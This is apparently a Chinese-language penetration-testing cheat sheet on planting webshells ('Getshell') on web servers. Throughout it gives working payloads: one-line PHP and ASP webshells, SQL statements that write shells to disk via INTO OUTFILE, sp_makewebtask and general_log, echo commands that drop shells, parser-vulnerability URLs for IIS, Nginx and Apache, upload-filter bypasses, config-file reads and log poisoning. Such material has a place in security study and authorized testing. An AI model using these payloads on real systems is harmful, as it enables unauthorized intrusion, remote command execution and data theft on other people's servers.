進后臺Getshell

管理員后臺直接Getshell

管理員后臺直接上傳Getshell，有時候帶密碼的Webshell連接時容易被waf攔截，可以上傳不加密的Webshell如有權(quán)限限制可以嘗試管理后臺自帶的修改文件名功能在文件名前加../來穿越目錄，如上傳的文件為a.php，將a.php修改為../a.php。

后臺數(shù)據(jù)庫備份Getshell

后臺數(shù)據(jù)庫備份getshell，上傳圖片馬并獲取圖片馬路徑，通過數(shù)據(jù)庫備份修改后綴名，如有后綴名無法修改或路徑無法修改限制可修改前端代碼繞過，當所備份的數(shù)據(jù)庫來源無法修改時，我們可以通過首先將一句話木馬寫入數(shù)據(jù)庫，比如通過新建管理員用戶，將用戶名用一句話木馬代替（用戶名通常有長度限制，在前端修改maxlength即可），<%eval request ("pass")%> 然后再通過備份數(shù)據(jù)庫后訪問此界面Getshell。

各類上傳Getshell

https://choge.top/2020/02/29/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%AB%98%E7%BA%A7%E5%88%A9%E7%94%A8/

修改網(wǎng)站上傳類型Getshell

修改網(wǎng)站上傳類型，后臺設(shè)置中添加aasps|asp|php|jsp|aspx|asa|cer，保存后上傳aasps文件，上傳后為asp文件可以解析Getshll

上傳其他腳本類型Getshell

一臺服務(wù)器有多個站，如a網(wǎng)站為asp腳本，b網(wǎng)站為php腳本，而a中限制了上傳文件類型為asp的文件，此時可以上傳php的腳本，來拿shell；也可以嘗試腳本文件后綴名改為asa或者在后面直接加個.如xx.asp.來突破文件類型限制進行上傳來Getshell

解析漏洞Getshell

IIS6.0解析漏洞

http://www.xxx.com/xx.asp/xx.jpg
http://www.xxx.com/xx.asp/xx.txt
http://www.xxx.com/xx.asp/xx.asp;jpg

IIS7.0/7.5、Nginx<8.0解析漏洞

http://www.xxx.com/xx.jpg/.php

Nginx<8.03空字節(jié)代碼執(zhí)行漏洞

版本范圍：Nginx0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

http://www.xxx.com/xx.jpg%00.php

Apache解析漏洞

http://www.xxx.com/xx.php.owf.rar逆向解析，直到能解析出php為止

CVE-2013-4547 Nginx解析漏洞

http://www.xxx.com/xx.jpg（非編碼空格）\0.php

編輯器漏洞Getshell

傳送門：

https://navisec.it/%e7%bc%96%e8%be%91%e5%99%a8%e6%bc%8f%e6%b4%9e%e6%89%8b%e5%86%8c/

網(wǎng)站配置插馬Getshell

進入后臺后，網(wǎng)站配置插馬getshell，可以找到源碼本地搭建，插入時注意與源碼閉合，如果插入出錯可能導(dǎo)致網(wǎng)站報廢。如asp中單引號表示單行注釋作用"%><%eval request("v01cano")%><%'

編輯器模版Getshell

通過網(wǎng)站的模版編寫一句話，然后生成腳本文件getshell 通過將木馬添加到壓縮文件，把名字改為網(wǎng)站的模版類型，上傳到服務(wù)器，getshell）（新建或修改目錄名為xx.asp/ 此目錄下的jsp，html會以asp執(zhí)行，配置iis6.有0解析漏洞

修改腳本文件Getshell

修改后臺腳本文件插入一句話直接Getshell，盡量插在頭和尾。

###上傳插件、更新頁面Getshell

wordpress，dz等，如編輯wordpress404頁面插入一句話，可以先下載對應(yīng)版本找到404路徑，部分OA上傳插件Getshell， jboss，tomcat上傳war包getshell等

執(zhí)行sql語句寫入Webshell

首先執(zhí)行錯誤的sql語句，使其暴露出網(wǎng)站的根目錄，以ecshop為例，進入后臺執(zhí)行sql查詢

select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";

關(guān)于此語句說明，在windows中有時候需要使用斜杠/有時候需要使用雙反斜杠\末尾有時候需要分號，有時候也不需要分號。也可以先將一句話通過ecshop的新建管理員寫入到user表中，然后通過數(shù)據(jù)庫備份配合解析漏洞Getshell。

命令執(zhí)行Getshell

Windows

echo ^<^?php @eval($_POST[C0cho]);?^>^ >c:\1.php

復(fù)制

Linux

echo -e "<?php @assert(\$_POST[C0cho])?>" > 1.php

復(fù)制

Linux需要在$前加\進行防轉(zhuǎn)義，Windows需要在<前加^防轉(zhuǎn)義，Windows和Linux中的 “可以使用’或不使用進行嘗試

文件包含Getshell

文件包含有時可繞過waf

asp包含

include file="123.jpg"`調(diào)用的文件必須和被調(diào)用的文件在同一目錄，否則找不到，如果不在同一目錄，用下面語句也使用如下代碼`include virtual="文件所在目錄/123.jpg"

php包含

<?phpinclude('123.jpg');?>

復(fù)制

使用php://input

使用burpsuite截取數(shù)據(jù)包，并修改內(nèi)容轉(zhuǎn)發(fā)(還可以使用hackbar工具中的post data中輸入<?php fputs(fopen("shell1.php","w"),'1111<?php @assert($_POST[xss])?>2222')?>等一句話木馬)

截取get請求

將一句話木馬

瀏覽器訪問查看是否成功

數(shù)據(jù)庫命令執(zhí)行Getshell

Access導(dǎo)出

Access可導(dǎo)出xxx等文件需要配合解析漏洞

create table cmd (a varchar(50));
insert into cmd (a) values ('一句話木馬')   # 一句話木馬如：<%execute request(1)%>select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd drop table cmd

菜刀直連https://www.webshell.cc/1.asa;x.xls

Sqlserver導(dǎo)出

exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>" '--

Mysql導(dǎo)出

以phpMyAdmin為例

方式一

create TABLE xiaoma (xiaoma1 text NOT NULL);insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma]);?>');select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';drop TABLE IF EXISTS xiaoma

方式二

select "<?php eval($_POST[v01cano]);?>" into outfile 'D:/phpstudy/www/a.php'

方式三

當數(shù)據(jù)庫路徑未知時Getshell

//創(chuàng)建表a,并且將httpd.conf寫入到表a中create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;

復(fù)制

然后執(zhí)行導(dǎo)出操作，將該文件下載，使用notepad++打開，最后搜索documentroot，即可找到網(wǎng)站的根目錄：

文件可能存在的一些路徑：

Windowsc:\windows\php.ini                    php配置文件
c:\windows\system32\inetsrv\MetaBase.xml       # IIS虛擬主機配置文件 
Linux/etc/php.ini                              php配置文件
/etc/httpd/conf.d/php.conf/etc/httpd/conf/httpd.conf        # Apache配置文件
/usr/local/apache/conf/httpd.conf/usr/local/apache2/conf/httpd.conf/usr/local/mysql/user/local/httpd/conf/httpd.conf/usr/local/apache/conf/extra/httpd-vhosts.conf # 虛擬目錄配置文件
/user/local/nginx/conf/httpd.conf              # Nginx配置文件

方式四通過load_file函數(shù)直接加載該文件內(nèi)容

select load_file('C:/phpStudy/Apache/conf/httpd.conf');

同時需要做如下配置

方式五

general_log_file方法獲取Webshell

show global variables like 'secure%'顯示secure_file_priv的值為NULL，不能利用寫into outfile寫木馬getshell。

show global variables like "%genera%";  #查看genera文件配置情況set global general_log = off;   #關(guān)閉general_log  set global general_log = 'on';  #如果general_log關(guān)閉需要開啟set global general_log_file = 'D:/www/web/shell.php'

方式六

可執(zhí)行命令方式

select '<?php echo \'<pre>\'; system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/shell.php'

使用方法

www.xxx.com/shell.php?cmd=ipconfig  #cmd=后面加命令

方式七

過殺毒軟件方式

上傳圖片馬c.jpg，圖片馬內(nèi)容如下：

<?php

導(dǎo)出Webshell

select '<?php include 'c.jpg'?>' INTO OUTFILE 'D:/work/www/shell.php'

方式八

直接導(dǎo)出加密Webshell

select unhex('加密代碼') into dumpfile 'D:/www/web/shell.php'

不進后臺Getshell

0day Getshell

各類OA，coremail，cms，php框架，數(shù)據(jù)庫，java框架等0day，1day，nday Getshell

寫入日志Getshell

獲取日志路徑，在訪問過程中在url或者其他位置寫入<?php eval($_POST[c]);?>等信息，使其日志記錄此代碼，然后訪問日志路徑，菜刀連接Getshell，如phpinfo();中能查看到error.log和access.log的路徑。

IIS/Tomcat寫權(quán)限Getshell

IIS6.0，put協(xié)議上傳手工或工具，批量掃描工具：iis put scaner，寫權(quán)限利用：桂林老兵

Tomcat put上傳 CVE-2017-12615 工具傳送門：

https://link.zhihu.com/?target=https%3A//github.com/iBearcat/CVE-2017-12615

上傳漏洞Getshell

https://choge.top/2020/02/24/upload-labs%E8%AE%B0%E5%BD%95/

上傳會員頭像Getshell

將Webshell放入文件夾，然后壓縮成zip文件。上傳正常頭像抓包將圖片文件內(nèi)容刪除，burp右鍵選擇文件黏貼功能，將zip包內(nèi)容復(fù)制到burp中的圖片內(nèi)容，放行后菜刀連接圖片上傳路徑下的文件夾（zip壓縮包名）下的Webshell

注入漏洞Getshell

https://choge.top/2020/03/19/MsSQL%E6%B3%A8%E5%85%A5/

遠程命令執(zhí)行

參考Linux/Windows反彈shell，腳本語言、powershell反彈shell，Kali/Cobalt Strike等各種上線方法

其他漏洞Getshell

XXE，SSRF，反序列化，strust2等一種或多種組合利用Getshell